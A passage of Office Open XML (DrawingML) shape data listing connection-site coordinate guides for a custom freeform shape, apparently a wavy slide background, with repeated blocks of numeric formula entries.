              <a:gd name="connsiteX116" fmla="*/ 3498001 w 12192000"/>
              <a:gd name="connsiteY116" fmla="*/ 231941 h 4939827"/>
              <a:gd name="connsiteX117" fmla="*/ 3561557 w 12192000"/>
              <a:gd name="connsiteY117" fmla="*/ 228095 h 4939827"/>
              <a:gd name="connsiteX118" fmla="*/ 3611920 w 12192000"/>
              <a:gd name="connsiteY118" fmla="*/ 218094 h 4939827"/>
              <a:gd name="connsiteX119" fmla="*/ 3620528 w 12192000"/>
              <a:gd name="connsiteY119" fmla="*/ 218788 h 4939827"/>
              <a:gd name="connsiteX120" fmla="*/ 3620766 w 12192000"/>
              <a:gd name="connsiteY120" fmla="*/ 218511 h 4939827"/>
              <a:gd name="connsiteX121" fmla="*/ 3629977 w 12192000"/>
              <a:gd name="connsiteY121" fmla="*/ 218664 h 4939827"/>
              <a:gd name="connsiteX122" fmla="*/ 3636217 w 12192000"/>
              <a:gd name="connsiteY122" fmla="*/ 220048 h 4939827"/>
              <a:gd name="connsiteX123" fmla="*/ 3709484 w 12192000"/>
              <a:gd name="connsiteY123" fmla="*/ 186927 h 4939827"/>
              <a:gd name="connsiteX124" fmla="*/ 3761342 w 12192000"/>
              <a:gd name="connsiteY124" fmla="*/ 177474 h 4939827"/>
              <a:gd name="connsiteX125" fmla="*/ 3799748 w 12192000"/>
              <a:gd name="connsiteY125" fmla="*/ 167154 h 4939827"/>
              <a:gd name="connsiteX126" fmla="*/ 3922756 w 12192000"/>
              <a:gd name="connsiteY126" fmla="*/ 194044 h 4939827"/>
              <a:gd name="connsiteX127" fmla="*/ 4028476 w 12192000"/>
              <a:gd name="connsiteY127" fmla="*/ 223679 h 4939827"/>
              <a:gd name="connsiteX128" fmla="*/ 4191582 w 12192000"/>
              <a:gd name="connsiteY128" fmla="*/ 238952 h 4939827"/>
              <a:gd name="connsiteX129" fmla="*/ 4251024 w 12192000"/>
              <a:gd name="connsiteY129" fmla="*/ 240874 h 4939827"/>
              <a:gd name="connsiteX130" fmla="*/ 4355275 w 12192000"/>
              <a:gd name="connsiteY130" fmla="*/ 260205 h 4939827"/>
              <a:gd name="connsiteX131" fmla="*/ 4423807 w 12192000"/>
              <a:gd name="connsiteY131" fmla="*/ 270366 h 4939827"/>
              <a:gd name="connsiteX132" fmla="*/ 4558432 w 12192000"/>
              <a:gd name="connsiteY132" fmla="*/ 269194 h 4939827"/>
              <a:gd name="connsiteX133" fmla="*/ 4635061 w 12192000"/>
              <a:gd name="connsiteY133" fmla="*/ 280682 h 4939827"/>
              <a:gd name="connsiteX134" fmla="*/ 4807427 w 12192000"/>
              <a:gd name="connsiteY134" fmla="*/ 276835 h 4939827"/>
              <a:gd name="connsiteX135" fmla="*/ 5028933 w 12192000"/>
              <a:gd name="connsiteY135" fmla="*/ 183887 h 4939827"/>
              <a:gd name="connsiteX136" fmla="*/ 5093642 w 12192000"/>
              <a:gd name="connsiteY136" fmla="*/ 177214 h 4939827"/>
              <a:gd name="connsiteX137" fmla="*/ 5102642 w 12192000"/>
              <a:gd name="connsiteY137" fmla="*/ 186816 h 4939827"/>
              <a:gd name="connsiteX138" fmla="*/ 5193590 w 12192000"/>
              <a:gd name="connsiteY138" fmla="*/ 156458 h 4939827"/>
              <a:gd name="connsiteX139" fmla="*/ 5323922 w 12192000"/>
              <a:gd name="connsiteY139" fmla="*/ 146332 h 4939827"/>
              <a:gd name="connsiteX140" fmla="*/ 5421860 w 12192000"/>
              <a:gd name="connsiteY140" fmla="*/ 167298 h 4939827"/>
              <a:gd name="connsiteX141" fmla="*/ 5476948 w 12192000"/>
              <a:gd name="connsiteY141" fmla="*/ 173249 h 4939827"/>
              <a:gd name="connsiteX142" fmla="*/ 5516842 w 12192000"/>
              <a:gd name="connsiteY142" fmla="*/ 184018 h 4939827"/>
              <a:gd name="connsiteX143" fmla="*/ 5619415 w 12192000"/>
              <a:gd name="connsiteY143" fmla="*/ 176781 h 4939827"/>
              <a:gd name="connsiteX144" fmla="*/ 5789867 w 12192000"/>
              <a:gd name="connsiteY144" fmla="*/ 150304 h 4939827"/>
              <a:gd name="connsiteX145" fmla="*/ 5825953 w 12192000"/>
              <a:gd name="connsiteY145" fmla="*/ 147907 h 4939827"/>
              <a:gd name="connsiteX146" fmla="*/ 5856168 w 12192000"/>
              <a:gd name="connsiteY146" fmla="*/ 158719 h 4939827"/>
              <a:gd name="connsiteX147" fmla="*/ 5862476 w 12192000"/>
              <a:gd name="connsiteY147" fmla="*/ 172447 h 4939827"/>
              <a:gd name="connsiteX148" fmla="*/ 5882195 w 12192000"/>
              <a:gd name="connsiteY148" fmla="*/ 173195 h 4939827"/>
              <a:gd name="connsiteX149" fmla="*/ 5952585 w 12192000"/>
              <a:gd name="connsiteY149" fmla="*/ 161012 h 4939827"/>
              <a:gd name="connsiteX150" fmla="*/ 6001964 w 12192000"/>
              <a:gd name="connsiteY150" fmla="*/ 154786 h 4939827"/>
              <a:gd name="connsiteX151" fmla="*/ 6184207 w 12192000"/>
              <a:gd name="connsiteY151" fmla="*/ 132658 h 4939827"/>
              <a:gd name="connsiteX152" fmla="*/ 6415830 w 12192000"/>
              <a:gd name="connsiteY152" fmla="*/ 136006 h 4939827"/>
              <a:gd name="connsiteX153" fmla="*/ 6756965 w 12192000"/>
              <a:gd name="connsiteY153" fmla="*/ 57636 h 4939827"/>
              <a:gd name="connsiteX154" fmla="*/ 6819400 w 12192000"/>
              <a:gd name="connsiteY154" fmla="*/ 30742 h 4939827"/>
              <a:gd name="connsiteX155" fmla="*/ 6986370 w 12192000"/>
              <a:gd name="connsiteY155" fmla="*/ 12659 h 4939827"/>
              <a:gd name="connsiteX156" fmla="*/ 6989536 w 12192000"/>
              <a:gd name="connsiteY156" fmla="*/ 14528 h 4939827"/>
              <a:gd name="connsiteX157" fmla="*/ 7015933 w 12192000"/>
              <a:gd name="connsiteY157" fmla="*/ 9653 h 4939827"/>
              <a:gd name="connsiteX158" fmla="*/ 7020592 w 12192000"/>
              <a:gd name="connsiteY158" fmla="*/ 1651 h 4939827"/>
              <a:gd name="connsiteX159" fmla="*/ 7025905 w 12192000"/>
              <a:gd name="connsiteY159"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581827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166439 w 12192000"/>
              <a:gd name="connsiteY19" fmla="*/ 252699 h 4939827"/>
              <a:gd name="connsiteX20" fmla="*/ 8281371 w 12192000"/>
              <a:gd name="connsiteY20" fmla="*/ 256875 h 4939827"/>
              <a:gd name="connsiteX21" fmla="*/ 8381609 w 12192000"/>
              <a:gd name="connsiteY21" fmla="*/ 240618 h 4939827"/>
              <a:gd name="connsiteX22" fmla="*/ 8406759 w 12192000"/>
              <a:gd name="connsiteY22" fmla="*/ 232517 h 4939827"/>
              <a:gd name="connsiteX23" fmla="*/ 8426506 w 12192000"/>
              <a:gd name="connsiteY23" fmla="*/ 241842 h 4939827"/>
              <a:gd name="connsiteX24" fmla="*/ 8427949 w 12192000"/>
              <a:gd name="connsiteY24" fmla="*/ 240981 h 4939827"/>
              <a:gd name="connsiteX25" fmla="*/ 8441468 w 12192000"/>
              <a:gd name="connsiteY25" fmla="*/ 241157 h 4939827"/>
              <a:gd name="connsiteX26" fmla="*/ 8565757 w 12192000"/>
              <a:gd name="connsiteY26" fmla="*/ 255317 h 4939827"/>
              <a:gd name="connsiteX27" fmla="*/ 8573171 w 12192000"/>
              <a:gd name="connsiteY27" fmla="*/ 258426 h 4939827"/>
              <a:gd name="connsiteX28" fmla="*/ 8573548 w 12192000"/>
              <a:gd name="connsiteY28" fmla="*/ 258241 h 4939827"/>
              <a:gd name="connsiteX29" fmla="*/ 8622021 w 12192000"/>
              <a:gd name="connsiteY29" fmla="*/ 261028 h 4939827"/>
              <a:gd name="connsiteX30" fmla="*/ 8672650 w 12192000"/>
              <a:gd name="connsiteY30" fmla="*/ 254821 h 4939827"/>
              <a:gd name="connsiteX31" fmla="*/ 8785543 w 12192000"/>
              <a:gd name="connsiteY31" fmla="*/ 263406 h 4939827"/>
              <a:gd name="connsiteX32" fmla="*/ 8830588 w 12192000"/>
              <a:gd name="connsiteY32" fmla="*/ 265483 h 4939827"/>
              <a:gd name="connsiteX33" fmla="*/ 8905142 w 12192000"/>
              <a:gd name="connsiteY33" fmla="*/ 264958 h 4939827"/>
              <a:gd name="connsiteX34" fmla="*/ 8968582 w 12192000"/>
              <a:gd name="connsiteY34" fmla="*/ 262728 h 4939827"/>
              <a:gd name="connsiteX35" fmla="*/ 8972994 w 12192000"/>
              <a:gd name="connsiteY35" fmla="*/ 263284 h 4939827"/>
              <a:gd name="connsiteX36" fmla="*/ 9004605 w 12192000"/>
              <a:gd name="connsiteY36" fmla="*/ 258041 h 4939827"/>
              <a:gd name="connsiteX37" fmla="*/ 9016165 w 12192000"/>
              <a:gd name="connsiteY37" fmla="*/ 261258 h 4939827"/>
              <a:gd name="connsiteX38" fmla="*/ 9043297 w 12192000"/>
              <a:gd name="connsiteY38" fmla="*/ 281547 h 4939827"/>
              <a:gd name="connsiteX39" fmla="*/ 9048315 w 12192000"/>
              <a:gd name="connsiteY39" fmla="*/ 279264 h 4939827"/>
              <a:gd name="connsiteX40" fmla="*/ 9054706 w 12192000"/>
              <a:gd name="connsiteY40" fmla="*/ 278538 h 4939827"/>
              <a:gd name="connsiteX41" fmla="*/ 9070919 w 12192000"/>
              <a:gd name="connsiteY41" fmla="*/ 281810 h 4939827"/>
              <a:gd name="connsiteX42" fmla="*/ 9076813 w 12192000"/>
              <a:gd name="connsiteY42" fmla="*/ 283909 h 4939827"/>
              <a:gd name="connsiteX43" fmla="*/ 9085871 w 12192000"/>
              <a:gd name="connsiteY43" fmla="*/ 285133 h 4939827"/>
              <a:gd name="connsiteX44" fmla="*/ 9086159 w 12192000"/>
              <a:gd name="connsiteY44" fmla="*/ 284887 h 4939827"/>
              <a:gd name="connsiteX45" fmla="*/ 9134606 w 12192000"/>
              <a:gd name="connsiteY45" fmla="*/ 288168 h 4939827"/>
              <a:gd name="connsiteX46" fmla="*/ 9195590 w 12192000"/>
              <a:gd name="connsiteY46" fmla="*/ 279568 h 4939827"/>
              <a:gd name="connsiteX47" fmla="*/ 9219336 w 12192000"/>
              <a:gd name="connsiteY47" fmla="*/ 278133 h 4939827"/>
              <a:gd name="connsiteX48" fmla="*/ 9232362 w 12192000"/>
              <a:gd name="connsiteY48" fmla="*/ 275894 h 4939827"/>
              <a:gd name="connsiteX49" fmla="*/ 9283638 w 12192000"/>
              <a:gd name="connsiteY49" fmla="*/ 299924 h 4939827"/>
              <a:gd name="connsiteX50" fmla="*/ 9371484 w 12192000"/>
              <a:gd name="connsiteY50" fmla="*/ 329634 h 4939827"/>
              <a:gd name="connsiteX51" fmla="*/ 9404829 w 12192000"/>
              <a:gd name="connsiteY51" fmla="*/ 339038 h 4939827"/>
              <a:gd name="connsiteX52" fmla="*/ 9427021 w 12192000"/>
              <a:gd name="connsiteY52" fmla="*/ 358784 h 4939827"/>
              <a:gd name="connsiteX53" fmla="*/ 9670844 w 12192000"/>
              <a:gd name="connsiteY53" fmla="*/ 405128 h 4939827"/>
              <a:gd name="connsiteX54" fmla="*/ 9816083 w 12192000"/>
              <a:gd name="connsiteY54" fmla="*/ 416573 h 4939827"/>
              <a:gd name="connsiteX55" fmla="*/ 9936741 w 12192000"/>
              <a:gd name="connsiteY55" fmla="*/ 437044 h 4939827"/>
              <a:gd name="connsiteX56" fmla="*/ 10050093 w 12192000"/>
              <a:gd name="connsiteY56" fmla="*/ 443783 h 4939827"/>
              <a:gd name="connsiteX57" fmla="*/ 10130090 w 12192000"/>
              <a:gd name="connsiteY57" fmla="*/ 459520 h 4939827"/>
              <a:gd name="connsiteX58" fmla="*/ 10173456 w 12192000"/>
              <a:gd name="connsiteY58" fmla="*/ 457749 h 4939827"/>
              <a:gd name="connsiteX59" fmla="*/ 10218232 w 12192000"/>
              <a:gd name="connsiteY59" fmla="*/ 459820 h 4939827"/>
              <a:gd name="connsiteX60" fmla="*/ 10354176 w 12192000"/>
              <a:gd name="connsiteY60" fmla="*/ 471377 h 4939827"/>
              <a:gd name="connsiteX61" fmla="*/ 10430681 w 12192000"/>
              <a:gd name="connsiteY61" fmla="*/ 481226 h 4939827"/>
              <a:gd name="connsiteX62" fmla="*/ 10478169 w 12192000"/>
              <a:gd name="connsiteY62" fmla="*/ 481774 h 4939827"/>
              <a:gd name="connsiteX63" fmla="*/ 10540907 w 12192000"/>
              <a:gd name="connsiteY63" fmla="*/ 485607 h 4939827"/>
              <a:gd name="connsiteX64" fmla="*/ 10614941 w 12192000"/>
              <a:gd name="connsiteY64" fmla="*/ 487592 h 4939827"/>
              <a:gd name="connsiteX65" fmla="*/ 10674098 w 12192000"/>
              <a:gd name="connsiteY65" fmla="*/ 521656 h 4939827"/>
              <a:gd name="connsiteX66" fmla="*/ 10874834 w 12192000"/>
              <a:gd name="connsiteY66" fmla="*/ 574867 h 4939827"/>
              <a:gd name="connsiteX67" fmla="*/ 10944981 w 12192000"/>
              <a:gd name="connsiteY67" fmla="*/ 615042 h 4939827"/>
              <a:gd name="connsiteX68" fmla="*/ 11006376 w 12192000"/>
              <a:gd name="connsiteY68" fmla="*/ 645957 h 4939827"/>
              <a:gd name="connsiteX69" fmla="*/ 11076308 w 12192000"/>
              <a:gd name="connsiteY69" fmla="*/ 675698 h 4939827"/>
              <a:gd name="connsiteX70" fmla="*/ 11148789 w 12192000"/>
              <a:gd name="connsiteY70" fmla="*/ 685041 h 4939827"/>
              <a:gd name="connsiteX71" fmla="*/ 11249129 w 12192000"/>
              <a:gd name="connsiteY71" fmla="*/ 684218 h 4939827"/>
              <a:gd name="connsiteX72" fmla="*/ 11299915 w 12192000"/>
              <a:gd name="connsiteY72" fmla="*/ 692177 h 4939827"/>
              <a:gd name="connsiteX73" fmla="*/ 11386973 w 12192000"/>
              <a:gd name="connsiteY73" fmla="*/ 708209 h 4939827"/>
              <a:gd name="connsiteX74" fmla="*/ 11500105 w 12192000"/>
              <a:gd name="connsiteY74" fmla="*/ 735014 h 4939827"/>
              <a:gd name="connsiteX75" fmla="*/ 11621735 w 12192000"/>
              <a:gd name="connsiteY75" fmla="*/ 789584 h 4939827"/>
              <a:gd name="connsiteX76" fmla="*/ 11691200 w 12192000"/>
              <a:gd name="connsiteY76" fmla="*/ 867902 h 4939827"/>
              <a:gd name="connsiteX77" fmla="*/ 11819427 w 12192000"/>
              <a:gd name="connsiteY77" fmla="*/ 911634 h 4939827"/>
              <a:gd name="connsiteX78" fmla="*/ 11969720 w 12192000"/>
              <a:gd name="connsiteY78" fmla="*/ 964737 h 4939827"/>
              <a:gd name="connsiteX79" fmla="*/ 12055766 w 12192000"/>
              <a:gd name="connsiteY79" fmla="*/ 991268 h 4939827"/>
              <a:gd name="connsiteX80" fmla="*/ 12171539 w 12192000"/>
              <a:gd name="connsiteY80" fmla="*/ 995427 h 4939827"/>
              <a:gd name="connsiteX81" fmla="*/ 12187831 w 12192000"/>
              <a:gd name="connsiteY81" fmla="*/ 996580 h 4939827"/>
              <a:gd name="connsiteX82" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY82" fmla="*/ 996726 h 4939827"/>
              <a:gd name="connsiteX83" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY83" fmla="*/ 4939827 h 4939827"/>
              <a:gd name="connsiteX84" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY84" fmla="*/ 4939827 h 4939827"/>
              <a:gd name="connsiteX85" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY85" fmla="*/ 512043 h 4939827"/>
              <a:gd name="connsiteX86" fmla="*/ 7381 w 12192000"/>
              <a:gd name="connsiteY86" fmla="*/ 512580 h 4939827"/>
              <a:gd name="connsiteX87" fmla="*/ 100029 w 12192000"/>
              <a:gd name="connsiteY87" fmla="*/ 504758 h 4939827"/>
              <a:gd name="connsiteX88" fmla="*/ 155244 w 12192000"/>
              <a:gd name="connsiteY88" fmla="*/ 525130 h 4939827"/>
              <a:gd name="connsiteX89" fmla="*/ 254366 w 12192000"/>
              <a:gd name="connsiteY89" fmla="*/ 534449 h 4939827"/>
              <a:gd name="connsiteX90" fmla="*/ 447292 w 12192000"/>
              <a:gd name="connsiteY90" fmla="*/ 542725 h 4939827"/>
              <a:gd name="connsiteX91" fmla="*/ 628105 w 12192000"/>
              <a:gd name="connsiteY91" fmla="*/ 547853 h 4939827"/>
              <a:gd name="connsiteX92" fmla="*/ 783146 w 12192000"/>
              <a:gd name="connsiteY92" fmla="*/ 591799 h 4939827"/>
              <a:gd name="connsiteX93" fmla="*/ 1043676 w 12192000"/>
              <a:gd name="connsiteY93" fmla="*/ 591887 h 4939827"/>
              <a:gd name="connsiteX94" fmla="*/ 1281816 w 12192000"/>
              <a:gd name="connsiteY94" fmla="*/ 520946 h 4939827"/>
              <a:gd name="connsiteX95" fmla="*/ 1486347 w 12192000"/>
              <a:gd name="connsiteY95" fmla="*/ 487310 h 4939827"/>
              <a:gd name="connsiteX96" fmla="*/ 1568079 w 12192000"/>
              <a:gd name="connsiteY96" fmla="*/ 462531 h 4939827"/>
              <a:gd name="connsiteX97" fmla="*/ 1622516 w 12192000"/>
              <a:gd name="connsiteY97" fmla="*/ 466058 h 4939827"/>
              <a:gd name="connsiteX98" fmla="*/ 1655457 w 12192000"/>
              <a:gd name="connsiteY98" fmla="*/ 465359 h 4939827"/>
              <a:gd name="connsiteX99" fmla="*/ 1717454 w 12192000"/>
              <a:gd name="connsiteY99" fmla="*/ 417203 h 4939827"/>
              <a:gd name="connsiteX100" fmla="*/ 1913794 w 12192000"/>
              <a:gd name="connsiteY100" fmla="*/ 365255 h 4939827"/>
              <a:gd name="connsiteX101" fmla="*/ 2129762 w 12192000"/>
              <a:gd name="connsiteY101" fmla="*/ 367832 h 4939827"/>
              <a:gd name="connsiteX102" fmla="*/ 2376970 w 12192000"/>
              <a:gd name="connsiteY102" fmla="*/ 350129 h 4939827"/>
              <a:gd name="connsiteX103" fmla="*/ 2480155 w 12192000"/>
              <a:gd name="connsiteY103" fmla="*/ 359227 h 4939827"/>
              <a:gd name="connsiteX104" fmla="*/ 2586782 w 12192000"/>
              <a:gd name="connsiteY104" fmla="*/ 339352 h 4939827"/>
              <a:gd name="connsiteX105" fmla="*/ 2679617 w 12192000"/>
              <a:gd name="connsiteY105" fmla="*/ 305383 h 4939827"/>
              <a:gd name="connsiteX106" fmla="*/ 2788947 w 12192000"/>
              <a:gd name="connsiteY106" fmla="*/ 250375 h 4939827"/>
              <a:gd name="connsiteX107" fmla="*/ 2965530 w 12192000"/>
              <a:gd name="connsiteY107" fmla="*/ 245958 h 4939827"/>
              <a:gd name="connsiteX108" fmla="*/ 3103677 w 12192000"/>
              <a:gd name="connsiteY108" fmla="*/ 209527 h 4939827"/>
              <a:gd name="connsiteX109" fmla="*/ 3126759 w 12192000"/>
              <a:gd name="connsiteY109" fmla="*/ 211226 h 4939827"/>
              <a:gd name="connsiteX110" fmla="*/ 3164020 w 12192000"/>
              <a:gd name="connsiteY110" fmla="*/ 212779 h 4939827"/>
              <a:gd name="connsiteX111" fmla="*/ 3285019 w 12192000"/>
              <a:gd name="connsiteY111" fmla="*/ 220535 h 4939827"/>
              <a:gd name="connsiteX112" fmla="*/ 3365154 w 12192000"/>
              <a:gd name="connsiteY112" fmla="*/ 226416 h 4939827"/>
              <a:gd name="connsiteX113" fmla="*/ 3367507 w 12192000"/>
              <a:gd name="connsiteY113" fmla="*/ 225416 h 4939827"/>
              <a:gd name="connsiteX114" fmla="*/ 3387567 w 12192000"/>
              <a:gd name="connsiteY114" fmla="*/ 227103 h 4939827"/>
              <a:gd name="connsiteX115" fmla="*/ 3498001 w 12192000"/>
              <a:gd name="connsiteY115" fmla="*/ 231941 h 4939827"/>
              <a:gd name="connsiteX116" fmla="*/ 3561557 w 12192000"/>
              <a:gd name="connsiteY116" fmla="*/ 228095 h 4939827"/>
              <a:gd name="connsiteX117" fmla="*/ 3611920 w 12192000"/>
              <a:gd name="connsiteY117" fmla="*/ 218094 h 4939827"/>
              <a:gd name="connsiteX118" fmla="*/ 3620528 w 12192000"/>
              <a:gd name="connsiteY118" fmla="*/ 218788 h 4939827"/>
              <a:gd name="connsiteX119" fmla="*/ 3620766 w 12192000"/>
              <a:gd name="connsiteY119" fmla="*/ 218511 h 4939827"/>
              <a:gd name="connsiteX120" fmla="*/ 3629977 w 12192000"/>
              <a:gd name="connsiteY120" fmla="*/ 218664 h 4939827"/>
              <a:gd name="connsiteX121" fmla="*/ 3636217 w 12192000"/>
              <a:gd name="connsiteY121" fmla="*/ 220048 h 4939827"/>
              <a:gd name="connsiteX122" fmla="*/ 3709484 w 12192000"/>
              <a:gd name="connsiteY122" fmla="*/ 186927 h 4939827"/>
              <a:gd name="connsiteX123" fmla="*/ 3761342 w 12192000"/>
              <a:gd name="connsiteY123" fmla="*/ 177474 h 4939827"/>
              <a:gd name="connsiteX124" fmla="*/ 3799748 w 12192000"/>
              <a:gd name="connsiteY124" fmla="*/ 167154 h 4939827"/>
              <a:gd name="connsiteX125" fmla="*/ 3922756 w 12192000"/>
              <a:gd name="connsiteY125" fmla="*/ 194044 h 4939827"/>
              <a:gd name="connsiteX126" fmla="*/ 4028476 w 12192000"/>
              <a:gd name="connsiteY126" fmla="*/ 223679 h 4939827"/>
              <a:gd name="connsiteX127" fmla="*/ 4191582 w 12192000"/>
              <a:gd name="connsiteY127" fmla="*/ 238952 h 4939827"/>
              <a:gd name="connsiteX128" fmla="*/ 4251024 w 12192000"/>
              <a:gd name="connsiteY128" fmla="*/ 240874 h 4939827"/>
              <a:gd name="connsiteX129" fmla="*/ 4355275 w 12192000"/>
              <a:gd name="connsiteY129" fmla="*/ 260205 h 4939827"/>
              <a:gd name="connsiteX130" fmla="*/ 4423807 w 12192000"/>
              <a:gd name="connsiteY130" fmla="*/ 270366 h 4939827"/>
              <a:gd name="connsiteX131" fmla="*/ 4558432 w 12192000"/>
              <a:gd name="connsiteY131" fmla="*/ 269194 h 4939827"/>
              <a:gd name="connsiteX132" fmla="*/ 4635061 w 12192000"/>
              <a:gd name="connsiteY132" fmla="*/ 280682 h 4939827"/>
              <a:gd name="connsiteX133" fmla="*/ 4807427 w 12192000"/>
              <a:gd name="connsiteY133" fmla="*/ 276835 h 4939827"/>
              <a:gd name="connsiteX134" fmla="*/ 5028933 w 12192000"/>
              <a:gd name="connsiteY134" fmla="*/ 183887 h 4939827"/>
              <a:gd name="connsiteX135" fmla="*/ 5093642 w 12192000"/>
              <a:gd name="connsiteY135" fmla="*/ 177214 h 4939827"/>
              <a:gd name="connsiteX136" fmla="*/ 5102642 w 12192000"/>
              <a:gd name="connsiteY136" fmla="*/ 186816 h 4939827"/>
              <a:gd name="connsiteX137" fmla="*/ 5193590 w 12192000"/>
              <a:gd name="connsiteY137" fmla="*/ 156458 h 4939827"/>
              <a:gd name="connsiteX138" fmla="*/ 5323922 w 12192000"/>
              <a:gd name="connsiteY138" fmla="*/ 146332 h 4939827"/>
              <a:gd name="connsiteX139" fmla="*/ 5421860 w 12192000"/>
              <a:gd name="connsiteY139" fmla="*/ 167298 h 4939827"/>
              <a:gd name="connsiteX140" fmla="*/ 5476948 w 12192000"/>
              <a:gd name="connsiteY140" fmla="*/ 173249 h 4939827"/>
              <a:gd name="connsiteX141" fmla="*/ 5516842 w 12192000"/>
              <a:gd name="connsiteY141" fmla="*/ 184018 h 4939827"/>
              <a:gd name="connsiteX142" fmla="*/ 5619415 w 12192000"/>
              <a:gd name="connsiteY142" fmla="*/ 176781 h 4939827"/>
              <a:gd name="connsiteX143" fmla="*/ 5789867 w 12192000"/>
              <a:gd name="connsiteY143" fmla="*/ 150304 h 4939827"/>
              <a:gd name="connsiteX144" fmla="*/ 5825953 w 12192000"/>
              <a:gd name="connsiteY144" fmla="*/ 147907 h 4939827"/>
              <a:gd name="connsiteX145" fmla="*/ 5856168 w 12192000"/>
              <a:gd name="connsiteY145" fmla="*/ 158719 h 4939827"/>
              <a:gd name="connsiteX146" fmla="*/ 5862476 w 12192000"/>
              <a:gd name="connsiteY146" fmla="*/ 172447 h 4939827"/>
              <a:gd name="connsiteX147" fmla="*/ 5882195 w 12192000"/>
              <a:gd name="connsiteY147" fmla="*/ 173195 h 4939827"/>
              <a:gd name="connsiteX148" fmla="*/ 5952585 w 12192000"/>
              <a:gd name="connsiteY148" fmla="*/ 161012 h 4939827"/>
              <a:gd name="connsiteX149" fmla="*/ 6001964 w 12192000"/>
              <a:gd name="connsiteY149" fmla="*/ 154786 h 4939827"/>
              <a:gd name="connsiteX150" fmla="*/ 6184207 w 12192000"/>
              <a:gd name="connsiteY150" fmla="*/ 132658 h 4939827"/>
              <a:gd name="connsiteX151" fmla="*/ 6415830 w 12192000"/>
              <a:gd name="connsiteY151" fmla="*/ 136006 h 4939827"/>
              <a:gd name="connsiteX152" fmla="*/ 6756965 w 12192000"/>
              <a:gd name="connsiteY152" fmla="*/ 57636 h 4939827"/>
              <a:gd name="connsiteX153" fmla="*/ 6819400 w 12192000"/>
              <a:gd name="connsiteY153" fmla="*/ 30742 h 4939827"/>
              <a:gd name="connsiteX154" fmla="*/ 6986370 w 12192000"/>
              <a:gd name="connsiteY154" fmla="*/ 12659 h 4939827"/>
              <a:gd name="connsiteX155" fmla="*/ 6989536 w 12192000"/>
              <a:gd name="connsiteY155" fmla="*/ 14528 h 4939827"/>
              <a:gd name="connsiteX156" fmla="*/ 7015933 w 12192000"/>
              <a:gd name="connsiteY156" fmla="*/ 9653 h 4939827"/>
              <a:gd name="connsiteX157" fmla="*/ 7020592 w 12192000"/>
              <a:gd name="connsiteY157" fmla="*/ 1651 h 4939827"/>
              <a:gd name="connsiteX158" fmla="*/ 7025905 w 12192000"/>
              <a:gd name="connsiteY158"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09534 w 12192000"/>
              <a:gd name="connsiteY16" fmla="*/ 176441 h 4939827"/>
              <a:gd name="connsiteX17" fmla="*/ 8058681 w 12192000"/>
              <a:gd name="connsiteY17" fmla="*/ 219431 h 4939827"/>
              <a:gd name="connsiteX18" fmla="*/ 8126175 w 12192000"/>
              <a:gd name="connsiteY18" fmla="*/ 240005 h 4939827"/>
              <a:gd name="connsiteX19" fmla="*/ 8281371 w 12192000"/>
              <a:gd name="connsiteY19" fmla="*/ 256875 h 4939827"/>
              <a:gd name="connsiteX20" fmla="*/ 8381609 w 12192000"/>
              <a:gd name="connsiteY20" fmla="*/ 240618 h 4939827"/>
              <a:gd name="connsiteX21" fmla="*/ 8406759 w 12192000"/>
              <a:gd name="connsiteY21" fmla="*/ 232517 h 4939827"/>
              <a:gd name="connsiteX22" fmla="*/ 8426506 w 12192000"/>
              <a:gd name="connsiteY22" fmla="*/ 241842 h 4939827"/>
              <a:gd name="connsiteX23" fmla="*/ 8427949 w 12192000"/>
              <a:gd name="connsiteY23" fmla="*/ 240981 h 4939827"/>
              <a:gd name="connsiteX24" fmla="*/ 8441468 w 12192000"/>
              <a:gd name="connsiteY24" fmla="*/ 241157 h 4939827"/>
              <a:gd name="connsiteX25" fmla="*/ 8565757 w 12192000"/>
              <a:gd name="connsiteY25" fmla="*/ 255317 h 4939827"/>
              <a:gd name="connsiteX26" fmla="*/ 8573171 w 12192000"/>
              <a:gd name="connsiteY26" fmla="*/ 258426 h 4939827"/>
              <a:gd name="connsiteX27" fmla="*/ 8573548 w 12192000"/>
              <a:gd name="connsiteY27" fmla="*/ 258241 h 4939827"/>
              <a:gd name="connsiteX28" fmla="*/ 8622021 w 12192000"/>
              <a:gd name="connsiteY28" fmla="*/ 261028 h 4939827"/>
              <a:gd name="connsiteX29" fmla="*/ 8672650 w 12192000"/>
              <a:gd name="connsiteY29" fmla="*/ 254821 h 4939827"/>
              <a:gd name="connsiteX30" fmla="*/ 8785543 w 12192000"/>
              <a:gd name="connsiteY30" fmla="*/ 263406 h 4939827"/>
              <a:gd name="connsiteX31" fmla="*/ 8830588 w 12192000"/>
              <a:gd name="connsiteY31" fmla="*/ 265483 h 4939827"/>
              <a:gd name="connsiteX32" fmla="*/ 8905142 w 12192000"/>
              <a:gd name="connsiteY32" fmla="*/ 264958 h 4939827"/>
              <a:gd name="connsiteX33" fmla="*/ 8968582 w 12192000"/>
              <a:gd name="connsiteY33" fmla="*/ 262728 h 4939827"/>
              <a:gd name="connsiteX34" fmla="*/ 8972994 w 12192000"/>
              <a:gd name="connsiteY34" fmla="*/ 263284 h 4939827"/>
              <a:gd name="connsiteX35" fmla="*/ 9004605 w 12192000"/>
              <a:gd name="connsiteY35" fmla="*/ 258041 h 4939827"/>
              <a:gd name="connsiteX36" fmla="*/ 9016165 w 12192000"/>
              <a:gd name="connsiteY36" fmla="*/ 261258 h 4939827"/>
              <a:gd name="connsiteX37" fmla="*/ 9043297 w 12192000"/>
              <a:gd name="connsiteY37" fmla="*/ 281547 h 4939827"/>
              <a:gd name="connsiteX38" fmla="*/ 9048315 w 12192000"/>
              <a:gd name="connsiteY38" fmla="*/ 279264 h 4939827"/>
              <a:gd name="connsiteX39" fmla="*/ 9054706 w 12192000"/>
              <a:gd name="connsiteY39" fmla="*/ 278538 h 4939827"/>
              <a:gd name="connsiteX40" fmla="*/ 9070919 w 12192000"/>
              <a:gd name="connsiteY40" fmla="*/ 281810 h 4939827"/>
              <a:gd name="connsiteX41" fmla="*/ 9076813 w 12192000"/>
              <a:gd name="connsiteY41" fmla="*/ 283909 h 4939827"/>
              <a:gd name="connsiteX42" fmla="*/ 9085871 w 12192000"/>
              <a:gd name="connsiteY42" fmla="*/ 285133 h 4939827"/>
              <a:gd name="connsiteX43" fmla="*/ 9086159 w 12192000"/>
              <a:gd name="connsiteY43" fmla="*/ 284887 h 4939827"/>
              <a:gd name="connsiteX44" fmla="*/ 9134606 w 12192000"/>
